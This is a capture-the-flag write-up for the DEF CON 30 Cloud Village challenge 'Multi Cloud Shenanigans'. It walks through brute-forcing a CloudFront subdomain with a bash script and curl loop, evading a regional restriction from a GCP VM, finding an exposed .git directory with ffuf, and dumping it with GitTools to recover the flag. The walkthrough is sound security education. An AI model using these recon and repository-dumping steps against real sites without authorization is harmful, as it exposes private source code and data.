2022 Cloud Village CTF at DEF CON 30 - Multi Cloud Shenanigans


"Clair is a Google Cloud Administrator at PeopleBack Corp in California. Her company has acquired a product and, to provide more availability to the customers, they had to go to a multi-cloud setup.

The application is not available to their customers outside California. Can you find the issue and get the content of the site?"


Hint

PeopleBackCorp recently acquired BeoShaft



After the hint was released, I finally had a hit using the Code Search feature on sourcegraph.com for one of the terms relating to the challenge: BeoShaft

From there, I browsed directly to https://github.com/BeoShaft and clicked through the small amount of content in the repo until I saw this image:

"Word Art.jpeg"

The string "dc5vf5almyxxx" caught my attention right away. At first I thought this might be part of a URL for a Lambda function. I cross-checked its length against a function that exists in my personal account, and the lengths didn't match. Even if I removed the X's at the end of the string, I still wouldn't know the function name. I went back to the image and looked for anything that might be a Lambda function name, but then I was distracted by the string "cloudfront."

I know from working with CloudFront a bit that this could be a solid lead. I went back to my account, counted the characters in one of my own CloudFront domains, and saw that the lengths were the same.

To figure out the values for "xxx," I used the following script to generate all possible combinations of lower case characters and numbers:

$ cat permute.sh
#!/bin/bash
# 36-character alphabet: a-z plus 0-9
charset=({a..z} {0..9})

# permute DEPTH PREFIX: print every DEPTH-character string over charset,
# appended to PREFIX (empty on the first call)
permute(){
  (($1 == 0)) && { echo "$2"; return; }
  for char in "${charset[@]}"
  do
    permute "$(($1 - 1))" "$2$char"
  done
}

permute "$1"

$ permute.sh 3 >> list.txt

$ wc -l list.txt
46656 list.txt


The math checked out (36 characters to the power of 3 is 46656), so I started a screen session and ended up using a very slow for-loop:


$ for i in $(<list.txt);do echo >>results.txt && echo $i >> results.txt && curl -SI https://dc5vf5almy$i.cloudfront.net/ >>results.txt;done


Once this was finished, I looked at results.txt where I saw only one 403:


$ grep 403 results.txt -B1
sbn
HTTP/2 403 


I struggled here more than I'd like to admit, especially considering that I had a similar experience with last year's "Sweating It Out" challenge. But I realized I was targeting an AWS URL from an AWS instance, and that the challenge was called "Multi Cloud Shenanigans."


So I switched over to GCP and sent a request from a VM in the Los Angeles region, and this time I was able to connect to the target site.


Ultimately, I used ffuf to perform content discovery:

$ ./go/bin/ffuf -u https://dc5vf5almysbn.cloudfront.net/FUZZ -w SecLists/Discovery/Web-Content/common.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       
       v1.5.0-dev
________________________________________________
 :: Method           : GET
 :: URL              : https://dc5vf5almysbn.cloudfront.net/FUZZ
 :: Wordlist         : FUZZ: SecLists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
.git/config             [Status: 200, Size: 150, Words: 14, Lines: 9, Duration: 14ms]
.git/HEAD               [Status: 200, Size: 23, Words: 2, Lines: 2, Duration: 109ms]
.git/index              [Status: 200, Size: 4450, Words: 27, Lines: 33, Duration: 150ms]
<SNIP>



Finding exposed .git directories is always fun. I then used GitTools' gitdumper.sh against the target:


$ ./gitdumper.sh https://dc5vf5almysbn.cloudfront.net/.git dump1

Then, I used extractor.sh so I could grep through the contents:


$ ./extractor.sh ../Dumper/dump1 extract1


Finally, I grep'd for the flag:


$ grep -Ri flag- extract1/
extract1/2-6a60b5b7d330906c2a152f619bdf4dbbbaf75013/pricing/index.html:        <p class="mb-4">Let&rsquo;s talk about your requirements over a call - FLAG-{hk04MwP7XrTlu9QGyYQ0BP3SMILDr3Bx}</p>

Thanks for reading!

@strupo_

Find us on twitter: @teamWTG
